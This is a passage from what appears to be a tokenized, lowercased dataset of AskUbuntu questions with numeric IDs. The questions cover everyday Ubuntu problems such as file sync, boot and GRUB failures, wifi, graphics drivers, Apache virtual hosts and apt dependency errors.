failed to read : session.screen0.tabs.intitlebar setting default value failed to read : session.screen0.focusmodel setting default value failed to read : session.screen0.tabfocusmodel setting default value failed to read : session.screen0.focusnewwindows setting default value failed to read : session.screen0.rowplacementdirection setting default value failed to read : session.screen0.colplacementdirection setting default value failed to read : session.screen0.windowplacement setting default value bscreen : :bscreen : an error occured while querying the x server . another window manager already running on display:0.0 error : could n't find screens to manage . make sure you do n't have another window manager running . i would have made that more neat if i knew how
376485	ubuntu one does n't sync files on two ubuntu machines	i 've set up u1 on two machines . when i change a file on the first one the file on another becomes sync-ed , but when i change the file on the second machine the file on the first stays unchanged . why ? how to fix that ? the first machine ~ > u1sdtool -- list-folders folder list : id=6b629534-3519-4803-b98b-df7da16c7a9d subscribed=true path=/home/newzuba/keepassx id=2adc365f-2d9d-4ba5-b72c-8b382b8ebebc subscribed=false path=/home/newzuba/pictures - huawei u9508 ~ > u1sdtool -- list-dirty no dirty nodes . ~ > md5sum ~/keepassx/.keepassx.kdb 120d97ba320c0e856dbde82332b0d96d /home/newzuba/keepassx/.keepassx.kdb ~ > u1sdtool -s state : queue_manager connection : with user with network description : processing the commands pool is_connected : true is_error : false is_online : true queues : idle the second one - see the md5 sum is different ! ~ > u1sdtool -- list-folders folder list : id=6b629534-3519-4803-b98b-df7da16c7a9d subscribed=true path=/home/zuba/keepassx id=2adc365f-2d9d-4ba5-b72c-8b382b8ebebc subscribed=false path=/home/zuba/pictures - huawei u9508 ~ > u1sdtool -- list-dirty no dirty nodes . ~ > md5sum ~/keepassx/.keepassx.kdb e62ef2cccd4f6601d13b0e1fa9258d97 /home/zuba/keepassx/.keepassx.kdb ~ > u1sdtool -s state : queue_manager connection : with user with network description : processing the commands pool is_connected : true is_error : false is_online : true queues : idle
376487	any software that converts text to speech and sends speech via a microphone ?	i 'm in a strange predicament right now . i 'm taking a virtual class through work and at work in my cubicle . i 'd like to be able to quietly do this but sometimes i have to speak into the microphone instead of talking in the chat . i 'd like to just type into a program , have the program convert it into speech , and then send that speech into a microphone so i can remain silent and still communicate effectively with my instructor . if there is any software or even a python library , i 'd love to use it or build it myself . thank you ,
376488	ca n't shutdown through terminal	when ever i use the following sudo shutdown now sudo reboot sudo shutdown -h my laptop goes on halt , what exactly it is , sometime they work but not all the time .. why is it so.. ? ? is there something wrong with my input command or installation ? ?
376490	ca n't run python program in terminal	( i am using ubuntu 12.04 ) i made this python program : # ! /bin/sh # -*- coding : utf-8 -*- # created on tue nov 12 19:44:50 2013 # @ author : matthew import os print `` multiple command runner '' print `` < made by matthew cherrey > '' print `` -- -- -- -- -- -- -- -- -- -- -- -- - '' numbcommand = 0 allcoms = [ ] while 1 : numbcommand = numbcommand + 1 command = raw_input ( `` command : `` ) allcoms.append ( command ) decide = raw_input ( `` press [ enter ] to and another command , press [ r ] to run all commands : `` ) if decide == `` r '' : break commands = `` '' first = true for item in allcoms : if first : commands = item else : commands = commands + `` & & `` + item os.system ( commands ) and i want to be able to run it in the terminal . i use the python editor : spyder this has an option to `` run in system terminal '' . whenever i do this , my program works perfectly . i can enter multiple commands , and have them all run . when i set the file to an exicutible and run /home/matthew/.runallcommands.py -- python or /home/matthew/.runallcommands.py , first makes my cursor into a `` t '' which then when i click somewere , is take a picture of that area of the screen and saves it as a photo named `` os '' in my home folder . then i get this error message : matthew @ matthew-ms-7721 : ~ $ /home/matthew/.runallcommands.py -- python warning : unknown mime-type for `` multiple command runner '' -- using `` application/octet-stream '' error : no such file `` multiple command runner '' warning : unknown mime-type for `` < made by matthew cherrey > '' -- using `` application/octet-stream '' error : no such file `` < made by matthew cherrey > '' /home/matthew/.runallcommands.py : 13 : /home/matthew/.runallcommands.py : numbcommand : not found /home/matthew/.runallcommands.py : 14 : /home/matthew/.runallcommands.py : allcoms : not found /home/matthew/.runallcommands.py : 17 : /home/matthew/.runallcommands.py : syntax error : `` ( `` unexpected ( expecting `` do '' ) i am not sure if it has something to do with how i called the file , because my program worked 100 % fine in the terminal in spyder .
376491	vsftpd stopped automatically	i have installed vsftpd on my system ( ubuntu 11.04 ) and it was working fine but , now i am trying to connect ftp server with the help of command $ ftp xxx.xxx.xxx.xxx it is showing ftp : connect : connection refused ftp > . i tried to find out the status of vsftpd service . $ sudo service vsftpd status it showing vsftpd stop/waiting i tried to start the service $ sodo service vsftpd start and it showing vsftpd start/running , process 1975 then again tried connect it is showing connection refused and again status goes to the stop mode i do n't know how it is going to stop/waiting mode . please help me out thank you ! ! ! !
376493	usb wifi dongle pluggin in doesnt create wlan0 interface	i use d-link dwa-110 wifi usb dongle . it used to be working well , but after some config changes i broke something and now when i plug the dongle in i see it in lsusb output , but wlan0 is n't created and the led on the dongle does n't light . what to check out ? ~ > uname -a linux distress 3.2.0-56-generic # 86-ubuntu smp wed oct 23 17:31:43 utc 2013 i686 i686 i386 gnu/linux dmesg shows [ 667.824095 ] usb 1-8 : new high-speed usb device number 6 using ehci-pci [ 668.117996 ] usb 1-8 : new usb device found , idvendor=07d1 , idproduct=3c07 [ 668.118007 ] usb 1-8 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 668.118015 ] usb 1-8 : product : 802.11 bg wlan [ 668.118021 ] usb 1-8 : manufacturer : ralink
376496	pbis open & ubuntu 13.10 delayed logon	i have also found that since upgrading to ubuntu 13.10 from 13.04 that active directory users can not log into the system straight away even though wifi is connected ( unless thier credentials are cached ) . it seems as if the pbis open 7.5.1.1517 is not starting straight away , and usually works after about a 30-60 second wait . anybody else experiencing this ?
376497	http or ftp in sources.list ?	which protocols are better to use in /etc/apt/sources.list file ? http or ftp ? for example : deb http : //archive.ubuntu.com/ubuntu saucy main universe restricted multiverse or : deb ftp : //ftp.archive.ubuntu.com/ubuntu/ saucy main universe restricted multiverse
376498	grub - install and boot errors	i have a problem with my boot loader . i have two systems windows 7 and ubuntu 12.04 . today i have experienced an error while booting , grub went straight to . i have tried several times too repair grub with boot-repair . boot repair cant find the grub settings . i have also reinstalled grub with no luck . grub has shown me an error message `` permittion denied '' . i am quite reluctant to reinstall both of my systems can someone advise ? thanks
376500	brightness locked in dim after downloading ubuntu 13.10	i have a netbook samsung n 100 on which i installed ubuntu 13.10 before restarting the machine the brightness was perfect but as soon as i restarted it the brightness got dimmed . i tried everything fn + brightness , terminal commands : shows permission denied . i am annoyed with ubuntu 's new problem . if any one does have any idea about it please let me know how to resolve it
376501	adding a scale to a popup menu	for some reason when i add a slider ( scale ) to a popup menu it does n't work . it shows but does n't move . how can i get the slider to work ? just put this in a gtk : :window : require 'gtk3 ' # gtk2 will probably work class volumebutton < gtk : :button def initialize super ( ) @ theme = gtk : :icontheme.default self.image = gtk : :image.new ( @ theme.load_icon ( `` audio-volume-high '' , 16 , : force_svg ) ) @ menu = gtk : :menu.new @ menu.width_request = 200 @ item = gtk : :menuitem.new @ slider = gtk : :scale.new ( : horizontal , 0 , 100 , 1 ) @ item.add ( @ slider ) @ menu.append ( @ item ) @ menu.show_all # this makes it show self.signal_connect `` button-release-event '' do |widget , event| @ menu.popup ( nil , nil , event.button , event.time ) end end end
376503	nvidia geforce gt 520m driver	how to install nvidia geforce gt 520m driver on ubuntu 13.10 ? i want this graphic driver for steam 's games
376504	display date/time in ubuntu lock screen ( cinnamon-like )	i was using ubuntu 13.04 till a few days ago . i had installed nemo and i guess cinnamon got installed too ( i was still using unity nonetheless ) . one of the good things about that was the lock screen somehow changed to mimick cinnamon 's ( with the background as a darkened version of desktop background and date/time displayed ) , something like this : i have no idea how this happened , but it looked great . it does not seem to work on ubuntu 13.10 . anyone has any ideas to get a similar lock screen ? i just need to display the date/time on one side with the bg as a darkened version of my desktop wallpaper
376508	cron job creating empty files in root	my cron job , command looks similar to this : wget -q http : //whatever-url/ it is running correctly ( every minute ) . problem is that it is creating empty php files at my root for every minute it runs . i 'm not familiar with cron job commands . is there a cron command that keeps this from happening , but will not alter the way script runs ?
376509	building android apps on ubuntu	i want to learn to build apps on ubuntu , so after doing some resarch , i found out i need to install eclipse . the problem i have now is which one : there 's so many on : http : //www.eclipse.org/downloads/ or i should install : sudo aptitude search eclipse p eclipse - extensible tool platform and java ide p eclipse-cdt - c/c++ development tools for eclipse p eclipse-cdt-jni - c/c++ development tools for eclipse ( jni ) p eclipse-egit - eclipse team provider for the git version control system p eclipse-emf - eclipse modeling framework ( emf ) p eclipse-emf-examples - eclipse emf/xsd examples p eclipse-emf-sdk - eclipse modeling framework ( emf ) - ( source/documentation ) p eclipse-jdt - eclipse java development tools ( jdt ) p eclipse-jgit - java implementation of git for eclipse p eclipse-pde - eclipse plug-in development environment ( pde ) p eclipse-platform - eclipse platform without development plug-ins p eclipse-platform-data - eclipse platform without development plug-ins ( data ) p eclipse-rcp - eclipse rich client platform ( rcp ) p eclipse-rse - eclipse remote system explorer ( rse ) p eclipse-xsd - xml schema definition ( xsd ) for eclipse p eclipse-xsd-sdk - xml schema definition ( xsd ) for eclipse - ( source/documentation ) p libcommons-jci-eclipse-java - common java interface for various compilers - eclipse jdt p libeclipselink-java - eclipse persistence services project p libeclipselink-java-doc - documentation for libeclipselink-java p redeclipse - multiplayer fps game based on cube2 p redeclipse-data - data for the red eclipse fps game p redeclipse-dbg - debug symbols for the red eclipse fps game p redeclipse-server - server for the red eclipse fps game p redeclipse-server-dbg - debug symbols for the red eclipse dedicated server
376511	gnu radio companion ( grc ) fails to execute	i installed gnu radio from here ( http : //code.ettus.com/redmine/ettus/projects/uhd/wiki/gnuradio_linux ) now when i execute a simple flowgraph , the grc fails to execute and gives the following error : traceback ( most recent call last ) : file `` /home/meer/desktop/top_block.py '' , line 8 , in < module > from gnuradio import analog file `` /usr/local/lib/python2.7/dist-packages/gnuradio/analog/__init__.py '' , line 33 , in < module > from analog_swig import * file `` /usr/local/lib/python2.7/dist-packages/gnuradio/analog/analog_swig.py '' , line 26 , in < module > _analog_swig = swig_import_helper ( ) file `` /usr/local/lib/python2.7/dist-packages/gnuradio/analog/analog_swig.py '' , line 22 , in swig_import_helper _mod = imp.load_module ( '_analog_swig ' , fp , pathname , description ) importerror : libfftw3f.so.3 : can not open shared object file : no such file or directory i 've tried a few basic ways like ldconfig but so far none has worked . also , i 'm new to linux so any help will be much appreciated
376513	i can install ubuntu in my tablet hp slate 7 4600 ?	i want install ubuntu in my tablet hp slate 7 4600 , but i donâ´t know if possible ... someone can help me ? thanks ! ! greeting from colombia .
376517	remote access a dynamic ip address on a 3g dongle ?	i 'm new to ubuntu and trying to figure out if it 's possible to have a remote access using ssh keys on a 3g dongle ? is there any possible way ? maybe using a 3g wireless router ? how to set-up ? can i access dynamic ip address ? sorry got a lot of questions this is for my project . i hope you guys can help or sort it out . : )
376518	linker error : /usr/bin/ld : can not find -lgcc_s	i am trying to compile symlinks ( tar.gz-file ) , which is a very small tool with one line for compilation : gcc -wall -wstrict-prototypes -o2 -n -s -o symlinks symlinks.c which gives the error ... . /usr/bin/ld : can not find -lgcc_s /usr/bin/ld : can not find -lgcc_s collect2 : ld returned 1 exit status the output of /sbin/ldconfig -p | grep libgcc is libgcc_s.so.1 ( libc6 ) = > /lib/i386-linux-gnu/libgcc_s.so.1 and trying to include the mentioned directory directly gcc -wall -wstrict-prototypes -l /lib/i386-linux-gnu/ -o2 -n -s -o symlinks symlinks.c produces the same error . three questions : why does it not work with the first command , as the lib seems to be in the search path why does including the path itself does not help how to fix this ?
376520	ubuntu 13.04 not upgrading to 13.10	i click on upgrade to ubuntu and sometimes i get the upgrade to saucy page and say ok. then it starts downloading 2 of 2 downloading files . then flashes a couple of times and does nothing . sometimes i can not get the saucy pages . anything i can do to force it to update ? i tried : sudo apt-get update & & sudo apt-get upgrade thank you .
376524	serveralias override server name ?	i tried to setting up virtual host with apache2 on my ubuntu server . my servername is not working , it show wrong document , but the server alias is showing right document . how is that happen ? here is my virtual host config : < virtualhost *:80 > serveradmin webmaster @ bungamata.web.id servername bungamata.web.id serveralias www.bungamata.web.id documentroot /home/gusdecool/host/bungamata.web.id < directory / > options followsymlinks allowoverride none < /directory > < directory /home/gusdecool/host/bungamata.web.id > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > if you access http : //bungamata.web.id it shows wrong document , but if you open http : //www.bungamata.web.id it open the rights document . the right document should have content `` testing gan ''
376525	ecryptfs : lost passphrase	when i mounted some dir by mount -t ecryptfs private data i entered wrong password . i wrote data in this dir and now i ca n't mount it . i have no valid password and passphrase ( know only the same ) , but have sig in /root/.ecryptfs/sig-cache.txt . how i can recover my directory or , at least , brute it : type many-many passwords like entered when mounting this dir and compare generated sig with existing ?
376527	apt-setup-udeb succeeded but requested to be left unconfigured	i got a problem on a 12.4.3 server install , how can i fix this : apt-setup-udeb succeeded but requested to be left unconfigured config : 3 disks on soft raid5 an lvm on the raid5
376529	combine multiple iso files to burn a single bootable iso image	i have three iso files : `` ubuntu-10.10-desktop-i386.iso '' , `` ubuntu-11.10-desktop-amd64.iso , `` ubuntu-13.04-desktop-i386.iso `` i want to combine those multiple iso files and want to burn a single iso image file onto dvd that could let me use all of them . how can i do so .
376532	two 12.04 machines have the same display settings but different results	i have one machine that has a relatively fresh install of 12.04 and one that i inherited . the terminal window in the inherited machine has a really weird font , and the regular one is what i would expect . especially the behavior of the `` m '' character is messed up . note : both of these machines are on the same kvm switch . here is what i 've tried : myunity on both machines seem the same .bashrc on both machines seem similar in all the ways that would matter for this issue the terminal profiles on both machines are the default here are the xrandr outputs : good xrandr : screen 0 : minimum 320 x 200 , current 1280 x 1024 , maximum 4096 x 4096 vga1 connected 1280x1024+0+0 ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0 + 76.0 75.0* 72.0 70.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 640x480 72.8 75.0 66.7 60.0 720x400 70.1 bad xrandr : screen 0 : minimum 8 x 8 , current 1280 x 1024 , maximum 8192 x 8192 dp-0 disconnected ( normal left inverted right x axis y axis ) dp-1 disconnected ( normal left inverted right x axis y axis ) dp-2 disconnected ( normal left inverted right x axis y axis ) dp-3 connected 1280x1024+0+0 ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0*+ 76.0 75.0 72.0 70.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 640x480 75.0 72.8 59.9 finally here are screenshots of both machines , it seems to really only be terminal , i have askubuntu behind the terminal window for comparison : good screenshot : bad screenshot : any thoughts as to what this might be ?
376537	ubuntu and sony vaio issue	i recently downloaded ubuntu 13.10 and am trying to install it on a external hard drive . when i do install it and try to run it on my computer on start up it gets either ignored or if it recognizes the os it allows me to boot to it only to give me a ubuntu\winboot\wubildr.mbr error . i entered the bios and changed it to legacy mode and then i had an error that said , operating system not found . i returned the bios settings to what they were before . i have tried several solutions , like using universal usb installer but it did not do what i wanted it to do . how do i install and boot a proper ubuntu copy that i can boot from , i do n't know if my download of ubuntu is corrupted but i am working on the assumption that it is not . i am using a sony vaio sve14a35cxh , running windows 8 . the external is a western digital 500 gb hard drive in a usb 3.0 case .
376539	i done a stupid mistake dual-booting windows with ubuntu 13.10	when i installed ubuntu ( successfully ) with windows 8.1 , i had to re-install , because ubuntu would n't load , so i re installed ( on the installation page it said delete ubuntu and reinstall ) so i clicked that , and where my mouse spazed out it clicked lvm as well , when i read through it i didnt think it was much , ( first time user here ) so i installed and could n't boot into windows . i did n't mind that as much as my files were on windows , so i had to find out how to mount lvm drive , which i was unsuccessful at : / so can someone tell me if my stuff 's gone ? i ai n't so bothered but now i 'm stuck with ubuntu and i 'm so nooby at it everythings to do with terminal and i dont know how to use that ? : ( my comp didnt come with a backup disc or a windows disc , so im gon na have to spend âł70 on a new os ? thanks
376541	installation problem in windows 8 ( inbuilt )	i installed ubuntu 13.10 in windows 8 using unebootin and making my usb drive bootable . it installed completely but after rebooting , windows 8 started again without giving me option to choose my os . i restarted my laptop and opened boot order using f9 key . it shows ubuntu but after hiting enter , ubuntu did not started . it showed some black screen like command prompt giving option like grub > it did not worked . i wrote 'exit ' there to get out of there . please tell me if there is any way to open ubuntu . otherwise tell me how to delete that installed ubuntu . i am not able to uninstall that ubuntu as it has decreased my laptop 's speed ... . ? ? ? ?
376543	how do i kill a process without knowing its process id ?	if i close a process gameconqueror is attached to , before closing gameconqueror , the application ( gameconqueror ) continues to run , spamming `` failed to attach to process : no such process . '' or similar error . gameconqueror can not be sent kill through process name , nor process id since gameconqueror does n't use its own binary as a name for its process . nor does it use scanmem unless it 's actually scanning .
376544	how to configure multiple virtual machines as an internal network via ssh	first of all , i am using windows 7 as a host . then i install ubuntu 12.04 guest under virtualbox . then i get an access to the other four virtual machines ( also ubuntu 12.04 guest ) via ssh by running the following command in my ubuntu guest ' terminal : ssh user @ ipaddress then i want to connect those four virtual machines in an internal network , is there any ways to connect them under my ubuntu guest ? i 'm confused since i can only access those four virtual machines via ssh on my ubuntu 's terminal . edit : what i mean by `` connect '' is to physically connect them using their ethernet . for example , vm1 connect to vm2 by using eth1 on vm1 and eth2 on vm2 . i can do this in virtualbox , just add network adapter `` internal network '' for both of them . but as i said , i can only access those vms via my ubuntu 's terminal , i do n't have any access on their virtualbox . i appreciate any help . thank you , dulipat
376545	ubuntu 12.04 suspend state not working	when trying to turn the state suspend state the screen goes black , and after one second computer returns to the desktop.my motherboard is asus p5n-mx
376549	stop job before it 's dependencies	i have a job that does some things and uses other locally installed services ( such as the mail server ) . sometimes i do an acpi shutdown but i need this service to complete the ongoing operation before actually shutting down the machine . to make my job terminate gracefully i 've configured upstart to send the appropriate signal and to wait for 2 minutes before using sigkill . however that does not solve my problem because apparently the mail server also stops , but does so before my service , so eventually i do n't get the result that i wanted . how should i configure upstart to inform it of the existing dependency and so have it wait for my service to terminate before going on and terminate the other ones ? is there a way to do it ?
376552	hibernation on multi-user system	i 'm using xubuntu 13.10 and am having problems with hibernation when multiple users are logged in . i have already re-enabled hibernation as detailed in this bug https : //bugs.launchpad.net/ubuntu/+source/indicator-session/+bug/1232814 . my issue is if there are more than one active sessions . my situation is i am the only users with admin rights ( i belong to sudo ) on the family computer . if one of the kids suspends their session instead of logging out then i have difficulty hibernating . my difficulty is , i choose `` hibernate '' from the action menu , the screen is locked but never hibernates . when i unlock the screen i 'm prompted to supply my password to hibernate . i , and all others users , am able to suspend when others are logged in . i am able to hibernate as expected it no one else in logged in . i am able to hibernate if others are logged in by using `` sudo pm-hibernate '' . previous releases allowed me to hibernate the computer when others were logged in . to be clear when i say `` logged in '' the other accounts are not being remotely used , i mean the user did n't terminate his session . i can think of no solution to this after stumbling around in policykit settings .
376554	using xubuntu for heroes of newerth ?	i wish to play heroes of newerth . since i have older pc , it is kinda troublesome . i do cover the sys reqs , but barely . i have : 2,4ghrz amd processor ( which is overclocked with hz only , no voltage -- equal to 2,6ghrz - 2,8ghrz ) 1,312mb ram ( 1gb + 256mb chip -- i have 3 slots that are full ) 80gb hard drive nvidia geforce 5900zt . good but old video card ( has 1.6 of something that was required to be at least 1.4 ) creative sound blaster live ! 5.1 ( just bragging ; p ) my question is whether ubuntu 13.10 would run well overall ( gon na find out soon ) , and more importantly - if i can run the hon game under xubuntu . i currently have vector linux - it is lovely , but hon gives me black screen when launched ( could be a problem with my old processor or maybe old drivers -- stil ubuntu is more game-friendly )
376557	reboot of fresh install of ubuntu 12.04 is kiss of death- shutdown fails , reboot goes to `` recovery '' screen	computer : hp p6-2100 1-tb disk 8gb memory integrated graphics : amd radeon hd 6410d i once had an operating 12.04 system ( dual boot with windows7 ) on this hardware that started as 10.10 and migrated eventually to 12.04 . recently , its package manager got corrupted and after much anguish i decided to reload 12.04.3 from an image i burned . i could never get anything but a splashy colored screen with no intelligence and no cursor or keyboard response . i found in a thread somewhere the following code to edit into grub : grub_cmdline_linux_default= '' nosplash radeon.modeset=0 vga=773 '' grub_cmdline_linux= '' '' . this line was appended to the line containing `` kernel '' . i then get a normal looking install complete with graphics and explanations of the features of 12.04 terminating in a window saying `` installation complete ... . '' with a `` restart now '' button . pressing this gives me a black screen with blue vertical lines and random red rectangles- end of story-no restart . repowering , selecting `` ubuntu '' from the grub 1.99 menu , the machine halts with a `` recovery '' screen , that i have only succeeded in getting a root session in command mode from . typing , e.g . `` startx '' results in a hang . help ! ! ! ! ! ! ! norm
376558	how to play snake in terminal ?	today i caught a teacher playing snake at his tty console . i know that he has ubuntu . how does he made ? i tried to play myself in my treminal by typing snake and it told me : the program 'snake ' is currently not installed . you can install it by typing : sudo apt-get install bsdgames so , i installed bsdgames and then i started snake . but is not exactly what i expected . is different from what i saw ( a long , green snake ) . any other idea ?
376566	ca n't access to internet	u downloaded ubuntu 12.4.3 via windows 7 , using power iso . after the installation of ubuntu and the configuration of my wireless network , i could n't access the internet with firefox . why ?
376568	install ubuntu 13.10 windows 8 updated bios prior to instillation	my screen says : this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . i 've read a few of the answers to similar problems , one suggests that i must download the correct image , but i am running a 64 bit windows 8 os . the other answer i see is to go into my bios and enable virtualization , which i had prior attempting to install ubuntu and on a second check still appears to be enabled . so , at this point i am stuck and do n't know where to go from here . configurations i fear may be an issue , is that i have the everything that i have needed to download to get to this point loaded on a 16 gb flash drive . i am a n00b , so i might be missing something obvious , so any help will be appreciated .
376569	windows blue screen like problem in ubuntu 13.10	facing this weired problem in ubuntu 13.04 . even after upgrading to 13.10 the problem exists . its appear like windows blue screen . suddenly this screen appears . i had to push the powerbutton for seconds to shutdown the pc and start it again. ''
376571	wifi signal weak and disconnecting on ubuntu 13.04 with an intel wifi card	i have a very bad signal strength when my laptop is about 4-5 meters away from the router . the wifi struggles to connect , and when it eventually connects the signal is very low , about two bars . my software and hardware : â samsung ultrabook series 5 â ubuntu 13.04 my lshw : *-network description : wireless interface product : centrino advanced-n 6235 vendor : intel corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 24 serial : c8 : f7:33:3e:72:22 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.8.0-32-generic firmware=18.168.6.1 ip=10.90.1.4 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:45 memory : f0500000-f0501fff any hints how to dive a little more into this problem ?
376572	why would ladspa and lv2 plugins stop working occasionally ?	over the years i 've tried utilizing different audio production programs in linux , only to run into this problem at different points during my attempts to find a decent workflow . finding a solution to this issue would be overcoming one of my main complaints to utilizing linux in a more reliable way for music production . running xubuntu 64bit 13.04 my problem is that i 'll have an effects chain on any given number of channels , and then at some point one of them just stops working and mute that channel . when i disable the plugin the audio is still there . so i 'm not sure why only certain plugins would stop like this , or what 's triggering it in only some plugins , but not others . cpu percentage used does n't seem to be triggering this , it almost seems random . this is frustrating though . sometimes i 'll have to switch to another compression plugin just because another one seems to stop like this more often than others of the same variety . i 've seen this happen with a number of different plugins , running under ardour , lmms , and harrison mixbus ( which is based on ardour ) . this usually happens after i 've been working on a project and have loaded several plugins across different channels in a project . however , this is usually long before i reach the limit of my cpu/dsp processing power . all of a sudden my master channel ( usually a compressor plugin of some sort ) stops and goes mute , just for me to disable the plugin to hear the master bus again . this is n't limited just to the master bus , but it 's a particular example . any idea on what could be causing this problem ? and how can i avoid this issue ? has anyone else ran into this issue ?
376576	what are the specific files that ubuntu changes when you set the proxy in system settings ?	in ubuntu , i can set the proxy in system settings . then it asks for my sudo password to edit certain files . what are these files ? where are they located ? what lines are added or modified ? i am asking this question because i am using crunchbang , which does not have the system settings gui like ubuntu does .
376577	`` cd '' terminal order does n't work	i 'm trying to install clamav 0.98 of which first step is `cd ' to the directory containing the package 's source code and type `./configure ' to configure the package for your system . the problem is i do it and i get bash : cd : /myusername/programas_descargados : no existe el archivo o el directorio [ file or directory does n't exist ] can someone tell me why is this happening ?
376580	tty1 boot difficulty on dell xps 13	last night i got tired of windows ( really it happened before last night ) and decided to load ubuntu 12.04 on my dell xps 13 ( dell xps 13 xps13r2-1250slv , intel 3337u processor ) , initially the laptop 's screen did not work , however , if i plugged in an external display it would work normally . after reading forums , it seemed that 12.10 and then 13.04 have more ivy bridge support for intel hd 4000 graphics . so i updated all the way to 13.04 but now things are worse . the computer boots into tty1 and allows me to navigate around just fine in a full screen terminal , but that 's not what i am going for . is it possible to wipe and reload ubuntu ( i have a usb and other computers to make bootables with ) ? . also please be explicit with command line commands as i am pretty new with this interface and do n't know all the standard inputs . again what happens when it boots is : dell screen press a button to enter `` advanced options for ubuntu '' select `` advanced options for ubuntu '' select `` ubuntu , with linux 3.5.0-43-generic ( recovery mode ) fast scrolling words to indicate computer thinking a list containing : resume clean dpkg failsafex fsck grub network root system-summary select and run dpkg selecting yes on all prompts return to list in ( 5 ) and select resume '' ubuntu 13.04 [ computer ] tty1 [ computer ] login : i can login and then its all command prompt screen can i reload ubuntu with a clean install ? or fix what i have to get back to unity or some form of ui that is a little more familiar to non-command line all stars . any help would be appreciated and feel free to ask for more specifics
376588	how to version control a site with bazaar ?	basically , i want to make a local branch of my website so that i can edit files then merge them back to the server this is what i did : root @ aziz-hp : ~ # bzr init ftp : //user @ example.com/public_html/forums ftp user @ example.com password : created a standalone branch ( format : 2a ) root @ aziz-hp : ~ # cd /var/www/ root @ aziz-hp : /var/www # bzr checkout ftp : //user @ example.com/public_html/forums ftp user @ example.com password : root @ aziz-hp : /var/www # but the local folder is still empty except for `` .bzr '' directory
376590	black box in raptr using wine	i am new to ubuntu and have been trying to learn how to use it . i have tried to not ask as much as i can and find a found solution and it's the way i have been doing . but i have encountered a problem with an application called raptr . i have installed it under wine 1.4.1 but i get this black box behind the menu of the raptr . the app itself works just fine but i really want to get rid of this black box for visual reasons . any guide and help would be very much appreciated . my kernel is 13.10 saucy salamander
376592	installing ubuntu-13.10-server-amd64 on virtualbox-4.3.2-90405-win	i 'm trying to install ubuntu server 13.10 amd64 x86 ( the guest ) on my toshiba satellite l655d-s5109 ( the host ) . my/the processor is amd turion iip540 dual-core processor 2.40ghz ( 64bit os/x86 ) and i 'm using virtualbox 4.3.2 r90405 the problem i found is the common `` this kernel requires an x86-64 cpu but only detected an i686 cpu '' . reaing on other posts in here and stackoverflow and some other places i found out that i need the x86 virtualization ( wikipedia ) checking the oracle vm virtualbox on the vm system tab , i found that i do have the vt-x/amd-v on or activated or the checkbox checked ... but i still ca n't install ubuntu server , the message still appears ... what else is there to do ? should i giveup and install a 32bit ? should the virtualization be enables on my computer ( host ) bios or what else is there to check/verify ?
376595	how to install the correct graphical drivers ?	is there some general flowchart-like procedure or tutorial on how to troubleshoot graphical driver problems with ubuntu ? i am in a situation where i have a pc which i do not know anything about , i made a fresh install of ubuntu , opened unity and the screen started to flicker , decomposed itself into small tiles and became completely unusable . i would like to learn how to troubleshoot such a situation . that is something like a detailed explanation on how to : make sure the problem is the driver and not something else learn what hardware i am using based on this information , reinstall the correct driver i also do not know much about the world of graphic hardware companies and graphic cards in general , so if such a knowledge is important , please could you add some directions to find the necessary information ? as suggested in the two answers , i ran : lspci | grep vga and found out that i have an nvidia hardware and nouveau driver . i tried googling the two and found this guide . i turned off the gui using ctrl+alt+f2 , logged in and followed the instructions in the `` installation from console '' section of the tutorial . i then rebooted and the problem seems to be solved .
376597	i have a class project to create my own operating system . i have though about it a lot and now everything look confused	i thought about creating a operating system , i relying on your advise now on where to start to start making it .
376600	porting ubuntu for archos xenon 80	will it be possible for anyone to port ubuntu for archos xenon 80 if i give the updater-script file for the stock rom of the device ? please help !
376603	how can i resolve apt-get dependencies when partial upgrade failed ?	i am unable to run the update manager . when i start it , i get the following pop-up box : not all updates can be installed run a partial upgrade , to install as many updates as possible . this can be caused by : * a previous upgrade which did n't complete * problems with some installed software * unofficial software packages not provided by ubuntu * normal changes of a pre-release version of ubuntu i have the option to partial upgrade and close . i have tried partial update and it often fails . i have tried robert @ mythbuntu-pc : ~ $ sudo dpkg -- configure -a [ sudo ] password for robert : dpkg : dependency problems prevent configuration of python-gi : libglib2.0-0 ( 2.36.0-1ubuntu2 ) breaks python-gi ( < < 3.7.2 ) and is installed . version of python-gi to be configured is 3.2.2-1~precise . dpkg : error processing python-gi ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libimobiledevice3 : libimobiledevice3 depends on libtasn1-3 ( > = 2.14-0 ) ; however : version of libtasn1-3 on system is 2.10-1ubuntu1.1 . dpkg : error processing libimobiledevice3 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libtasn1-3-dev : libtasn1-3-dev depends on libtasn1-3 ( = 2.14-2 ) ; however : version of libtasn1-3 on system is 2.10-1ubuntu1.1 . dpkg : error processing libtasn1-3-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libimobiledevice-utils : libimobiledevice-utils depends on libimobiledevice3 ( > = 1.1.4 ) ; however : package libimobiledevice3 is not configured yet . dpkg : error processing libimobiledevice-utils ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libtasn1-3-bin : libtasn1-3-bin depends on libtasn1-3 ( > = 2.14-0 ) ; however : version of libtasn1-3 on system is 2.10-1ubuntu1.1 . dpkg : error processing libtasn1-3-bin ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnutls26 : libgnutls26 depends on libtasn1-3 ( > = 2.14-0 ) ; however : 